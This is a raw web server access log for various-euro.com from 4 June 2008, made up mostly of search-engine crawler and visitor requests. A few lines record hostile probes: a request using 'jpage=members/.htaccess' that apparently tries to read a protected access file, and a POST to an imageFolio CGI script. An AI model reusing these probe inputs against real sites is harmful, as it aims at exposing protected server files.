65.55.212.216 - - [04/Jun/2008:09:33:39 +0200] "GET /zampa/slike/E4IRWIN.GIF HTTP/1.0" 200 53174 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [04/Jun/2008:09:34:15 +0200] "GET /zampa/slike/S8CURATO.GIF HTTP/1.0" 200 16968 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [04/Jun/2008:09:34:16 +0200] "GET /zampa/slike/S5UROSTO.GIF HTTP/1.0" 200 45220 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [04/Jun/2008:09:34:36 +0200] "GET /zampa/slike/S3VAMPIR.GIF HTTP/1.0" 200 55504 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
193.252.149.15 - - [04/Jun/2008:09:34:51 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.149.15 - - [04/Jun/2008:09:34:55 +0200] "GET /warez.html HTTP/1.1" 200 9754 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
65.55.212.216 - - [04/Jun/2008:09:34:56 +0200] "GET /zampa/slike/S7MEDIAA.GIF HTTP/1.0" 200 45793 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.22.112 - - [04/Jun/2008:09:35:22 +0200] "GET /logs/usage_200607.html HTTP/1.0" 200 109660 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.212.216 - - [04/Jun/2008:09:36:05 +0200] "GET /zampa/slike/S4IRWIN.GIF HTTP/1.0" 200 54718 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [04/Jun/2008:09:36:42 +0200] "GET /zampa/slike/S2COPY.GIF HTTP/1.0" 200 12771 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
122.116.38.65 - - [04/Jun/2008:09:37:02 +0200] "GET http://www.various-euro.com/join.html?jpage=members/.htaccess HTTP/1.0" 404 2748 "http://www.various-euro.com/join.html?jpage=members/.htaccess" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
65.55.212.216 - - [04/Jun/2008:09:37:53 +0200] "GET /zampa/slike/E5UROSTO.GIF HTTP/1.0" 200 42690 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [04/Jun/2008:09:37:55 +0200] "GET /zampa/slike/S6BIENNI.GIF HTTP/1.0" 200 35877 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [04/Jun/2008:09:37:59 +0200] "GET /zampa/slike/E2COPY.GIF HTTP/1.0" 200 10416 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [04/Jun/2008:09:38:03 +0200] "GET /zampa/slike/S1TITEL.GIF HTTP/1.0" 200 15244 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [04/Jun/2008:09:38:05 +0200] "GET /zampa/slike/E8CURATO.GIF HTTP/1.0" 200 15386 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [04/Jun/2008:09:38:09 +0200] "GET /zampa/slike/E3VAMPIR.GIF HTTP/1.0" 200 52553 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [04/Jun/2008:09:38:12 +0200] "GET /zampa/slike/E7MEDIAA.GIF HTTP/1.0" 200 44716 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.28.88 - - [04/Jun/2008:09:41:08 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.88 - - [04/Jun/2008:09:41:09 +0200] "GET /neon/europa.html HTTP/1.0" 200 389 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.212.159 - - [04/Jun/2008:10:06:14 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.159 - - [04/Jun/2008:10:06:14 +0200] "GET /zampa-lovers/zampama2.mpg HTTP/1.0" 404 2748 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.22.112 - - [04/Jun/2008:10:12:30 +0200] "GET /logs/ HTTP/1.0" 200 10079 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:10:51:45 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:10:51:46 +0200] "GET /logs/usage_200709.html HTTP/1.0" 200 110974 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:10:58:23 +0200] "GET /DgH/watch/index.html HTTP/1.0" 200 2028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:10:58:24 +0200] "GET /DgH/watch/pict/Watch.mp3 HTTP/1.0" 200 29938 "http://www.various-euro.com/DgH/watch/index.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.106.167.250 - - [04/Jun/2008:10:59:16 +0200] "GET / HTTP/1.1" 200 10127 "http://www.google.com/search?client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&channel=s&hl=en&q=beograd+berlin&btnG=Google+Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 USDR6"
194.106.167.250 - - [04/Jun/2008:10:59:16 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 USDR6"
194.106.167.250 - - [04/Jun/2008:10:59:16 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 USDR6"
67.195.37.109 - - [04/Jun/2008:11:01:05 +0200] "GET /logs/usage_200701.html HTTP/1.0" 200 109268 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:11:08:47 +0200] "GET /zampa/montenegro/index.html HTTP/1.0" 200 2651 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:11:14:58 +0200] "GET /zampa/montenegro/ HTTP/1.0" 200 2651 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.112 - - [04/Jun/2008:11:17:41 +0200] "GET /logs/usage_200701.html HTTP/1.0" 200 109268 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:11:44:22 +0200] "GET /neon/europa.html HTTP/1.0" 200 389 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.112 - - [04/Jun/2008:11:47:13 +0200] "GET /zampa/montenegro/ZMAJW.html HTTP/1.0" 200 860 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
122.116.38.65 - - [04/Jun/2008:11:48:46 +0200] "GET http://various-euro.com/join.html?jpage=members/.htaccess HTTP/1.0" 404 2748 "http://various-euro.com/join.html?jpage=members/.htaccess" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
67.195.37.109 - - [04/Jun/2008:11:51:21 +0200] "GET /neon/warning2.html HTTP/1.0" 200 997 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
190.138.224.107 - - [04/Jun/2008:11:53:39 +0200] "POST /cgi-bin/imageFolio.cgi HTTP/1.1" 404 2748 "http://various-euro.com/cgi-bin/imageFolio.cgi" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
67.195.37.109 - - [04/Jun/2008:12:01:31 +0200] "GET /neon/click.html HTTP/1.0" 200 521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:12:03:01 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.180 - - [04/Jun/2008:12:13:57 +0200] "GET /games/ HTTP/1.0" 403 1223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.252.149.15 - - [04/Jun/2008:12:52:58 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.149.15 - - [04/Jun/2008:12:53:00 +0200] "GET /neon/europa.html HTTP/1.1" 200 389 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
74.6.22.112 - - [04/Jun/2008:13:20:06 +0200] "GET /rez/108.mp3 HTTP/1.0" 200 2086040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:13:42:51 +0200] "GET /neon/slow-walk.html HTTP/1.0" 200 1640 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
97.102.20.229 - - [04/Jun/2008:13:58:26 +0200] "GET /bmpp/18start.html HTTP/1.1" 200 320 "http://www.google.com/search?hl=en&rlz=1G1GGLQ_ENUS261&q=are+you+18+years+of+age&start=10&sa=N" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
97.102.20.229 - - [04/Jun/2008:13:58:26 +0200] "GET /bmpp/18oo.png HTTP/1.1" 200 3188 "http://www.various-euro.com/bmpp/18start.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
97.102.20.229 - - [04/Jun/2008:13:58:27 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
212.200.41.1 - - [04/Jun/2008:14:08:32 +0200] "HEAD /rez/557.mp3 HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
74.6.22.112 - - [04/Jun/2008:14:36:14 +0200] "GET /neon/large.html HTTP/1.0" 200 1547 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.162 - - [04/Jun/2008:14:43:05 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.162 - - [04/Jun/2008:14:43:05 +0200] "GET /contact.html HTTP/1.1" 404 2748 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.162 - - [04/Jun/2008:14:43:05 +0200] "GET /net.html HTTP/1.1" 404 2748 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
208.36.144.6 - - [04/Jun/2008:14:58:28 +0200] "GET /robots.txt HTTP/1.0" 302 363 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
208.36.144.10 - - [04/Jun/2008:15:01:32 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
74.6.22.112 - - [04/Jun/2008:15:04:59 +0200] "GET /games/virtualcop/virtualcop.html HTTP/1.0" 200 4487 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.214.45.123 - - [04/Jun/2008:15:34:55 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
65.214.45.123 - - [04/Jun/2008:15:34:55 +0200] "GET /neon/girlz2.html HTTP/1.0" 200 2937 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
74.6.22.112 - - [04/Jun/2008:15:38:25 +0200] "GET /rez/607.mp3 HTTP/1.0" 200 4964417 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.212.159 - - [04/Jun/2008:15:51:37 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.159 - - [04/Jun/2008:15:51:37 +0200] "GET /zampa-lovers/zampama2.mpg HTTP/1.0" 404 2748 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
67.195.37.109 - - [04/Jun/2008:16:12:14 +0200] "GET /neon/sushi.html HTTP/1.0" 200 687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.1.215.165 - - [04/Jun/2008:16:29:00 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
74.6.28.87 - - [04/Jun/2008:16:33:33 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.25 - - [04/Jun/2008:16:33:33 +0200] "GET /restate_copy.html HTTP/1.0" 200 97631 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:16:47:06 +0200] "GET /games/virtualcop/virtualcop.swf HTTP/1.0" 200 2563562 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.156 - - [04/Jun/2008:16:56:23 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.156 - - [04/Jun/2008:16:56:24 +0200] "GET /DgH/watch/ HTTP/1.1" 200 2028 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.160.180.168 - - [04/Jun/2008:17:01:41 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)"
202.160.180.69 - - [04/Jun/2008:17:01:48 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)"
74.6.22.101 - - [04/Jun/2008:17:29:16 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.101 - - [04/Jun/2008:17:29:17 +0200] "GET /logs/usage_200708.html HTTP/1.0" 200 111167 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:17:34:17 +0200] "GET /framez-girlz.html HTTP/1.0" 200 4271 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:17:34:18 +0200] "GET /neon/girlz2.html HTTP/1.0" 200 2937 "http://www.various-euro.com/framez-girlz.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:17:34:18 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://www.various-euro.com/framez-girlz.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:17:34:18 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "http://www.various-euro.com/framez-girlz.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.88 - - [04/Jun/2008:18:08:21 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.106 - - [04/Jun/2008:18:08:21 +0200] "GET /bmpp/18_x.html HTTP/1.0" 200 1100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
220.181.19.167 - - [04/Jun/2008:18:17:28 +0200] "GET /robots.txt HTTP/1.1" 302 363 "-" "-"
193.252.149.16 - - [04/Jun/2008:18:44:11 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.149.16 - - [04/Jun/2008:18:44:17 +0200] "GET /neon/sushi.html HTTP/1.1" 200 687 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
67.195.51.242 - - [04/Jun/2008:18:54:51 +0200] "GET /DgH/watch/ HTTP/1.0" 200 2028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:18:59:13 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:18:59:13 +0200] "GET /ve-icon-2.ico HTTP/1.0" 200 2238 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [04/Jun/2008:19:19:33 +0200] "GET /DgH/watch/ HTTP/1.0" 200 2028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.190.25.44 - - [04/Jun/2008:19:26:28 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:28 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:28 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "http://www.various-euro.com/" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:34 +0200] "GET /framez.html HTTP/1.1" 200 3883 "http://www.various-euro.com/framez_0.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:34 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:34 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 5834 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:34 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:34 +0200] "GET /bannerz/neon_click_3.gif HTTP/1.1" 200 240 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:34 +0200] "GET /bannerz/neon_click_2.gif HTTP/1.1" 200 387 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:34 +0200] "GET /bannerz/douwil.gif HTTP/1.1" 200 528 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:34 +0200] "GET /bannerz/anti_black_small.gif HTTP/1.1" 200 1009 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:34 +0200] "GET /bannerz/copyleft_black_small.gif HTTP/1.1" 200 1231 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:35 +0200] "GET /eurosign3.gif HTTP/1.1" 200 7879 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:35 +0200] "GET /bannerz/neon_click_1.gif HTTP/1.1" 200 890 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:35 +0200] "GET /bannerz/google/Logo_40blk.gif HTTP/1.1" 200 2308 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:35 +0200] "GET /bannerz/wet.gif HTTP/1.1" 200 18561 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:34 +0200] "GET /bannerz/goolag_468.jpg HTTP/1.1" 200 28285 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:35 +0200] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:35 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
84.190.25.44 - - [04/Jun/2008:19:26:34 +0200] "GET /bannerz/ubu-shot.png HTTP/1.1" 200 200117 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9) Gecko/2008051202 Firefox/3.0"
75.68.20.187 - - [04/Jun/2008:19:38:52 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
75.68.20.187 - - [04/Jun/2008:19:39:54 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
72.30.226.187 - - [04/Jun/2008:19:41:52 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
78.129.203.24 - - [04/Jun/2008:19:49:40 +0200] "GET /schubb/schubb-5.html HTTP/1.0" 200 72944 "http://www.various-euro.com/schubb/schubb-5.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041103 Firefox/1.0RC2"
67.195.52.26 - - [04/Jun/2008:20:04:29 +0200] "GET /DgH/bull/ HTTP/1.0" 200 1915 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
202.174.155.203 - - [04/Jun/2008:20:05:35 +0200] "GET /f-sponsor.html HTTP/1.0" 200 8578 "http://www.google.co.id/search?hl=id&q=EURO+SPONSOR&btnG=Telusuri+dengan+Google&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:05:38 +0200] "GET /16cols.gif HTTP/1.0" 404 2748 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:05:40 +0200] "GET /bannerz/rebelle.gif HTTP/1.0" 200 6986 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:05:39 +0200] "GET /bannerz/docubanner2.gif HTTP/1.0" 200 14804 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:05:49 +0200] "GET /bannerz/beLe.gif HTTP/1.0" 200 9193 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:05:50 +0200] "GET /bannerz/jimpunk.gif HTTP/1.0" 200 32077 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:05:54 +0200] "GET /bannerz/fbwnpiscreen.jpg HTTP/1.0" 200 8204 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:06:05 +0200] "GET /bannerz/lastone.jpg HTTP/1.0" 200 20195 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:06:10 +0200] "GET /bannerz/olmar.jpg HTTP/1.0" 200 10973 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:06:20 +0200] "GET /bannerz/bitnee.jpg HTTP/1.0" 200 10152 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:06:21 +0200] "GET /bannerz/MODUKITASCII468x60.jpg HTTP/1.0" 200 4792 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.174.155.203 - - [04/Jun/2008:20:06:24 +0200] "GET /bannerz/d2b_on_o_o.gif HTTP/1.0" 200 6772 "http://www.various-euro.com/f-sponsor.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
